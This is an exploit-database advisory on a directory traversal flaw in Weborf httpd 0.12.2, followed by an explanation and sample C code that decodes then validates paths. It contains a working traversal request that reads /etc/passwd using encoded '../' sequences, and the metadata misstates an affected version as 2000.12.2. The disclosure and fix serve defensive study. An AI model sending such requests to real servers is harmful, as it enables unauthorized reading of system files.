Vendor: Weborf httpd
By: Rew
CVSS: 7.5 HIGH
Directory Traversal
CWE: 22
Product Name: Weborf httpd
Affected Version From: 0.0.0
Affected Version To: 2000.12.2
Patch Exists: NO
Related CWE:
CPE: a:weborf:httpd:0.12.2
Metasploit:
Other Scripts:
Platforms Tested: Debian 5
2010

Weborf httpd <= 0.12.2 Directory Traversal Vulnerability

Weborf httpd <= 0.12.2 suffers from a directory traversal vulnerability. This vulnerability could allow attackers to read arbitrary files.

Mitigation:

Update to a version higher than 0.12.2.

Exploit-DB raw data:

Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author:	Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A

=============================================================

Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability.  This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.

instance.c : line 240-244
------------------------------
void modURL(char* url) {
    //Prevents the use of .. to access the whole filesystem  <-- ORLY?
    strReplace(url,"../",'\0');

    replaceEscape(url);
------------------------------

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

==============================================================

Stay safe,
Over and Out
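
The modURL() excerpt above strips "../" before replaceEscape() decodes %2f, so the filter never sees the encoded separators. The following C is an added example, not code from the advisory or from Weborf, showing the check in the safe order: decode once, then reject any ".." path segment. The names sanitize_url, url_decode and has_dotdot_segment are hypothetical.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Decode %XX escapes in place. Returns 0 on success, -1 on a malformed
 * escape or an encoded NUL byte (which would truncate the path). */
static int url_decode(char *s) {
    char *out = s;
    while (*s) {
        if (*s == '%') {
            if (!isxdigit((unsigned char)s[1]) || !isxdigit((unsigned char)s[2]))
                return -1;
            char hex[3] = { s[1], s[2], '\0' };
            char c = (char)strtol(hex, NULL, 16);
            if (c == '\0')
                return -1;
            *out++ = c;
            s += 3;
        } else {
            *out++ = *s++;
        }
    }
    *out = '\0';
    return 0;
}

/* Returns 1 if any '/'-separated segment of the decoded path is "..". */
static int has_dotdot_segment(const char *p) {
    while (*p) {
        size_t len = strcspn(p, "/");
        if (len == 2 && p[0] == '.' && p[1] == '.')
            return 1;
        p += len;
        if (*p == '/')
            p++;
    }
    return 0;
}

/* Hypothetical replacement for the check in modURL(): decode first, then
 * validate the string that will actually reach the filesystem. Returns 0
 * if the URL is acceptable (url is left decoded), -1 if it is rejected. */
int sanitize_url(char *url) {
    if (url_decode(url) != 0)
        return -1;
    return has_dotdot_segment(url) ? -1 : 0;
}
```

The path is decoded exactly once, so a doubly encoded separator stays a literal "%2f" in a file name. A server should still resolve the result with realpath() and confirm it lies under the document root, since symlinks are not covered here.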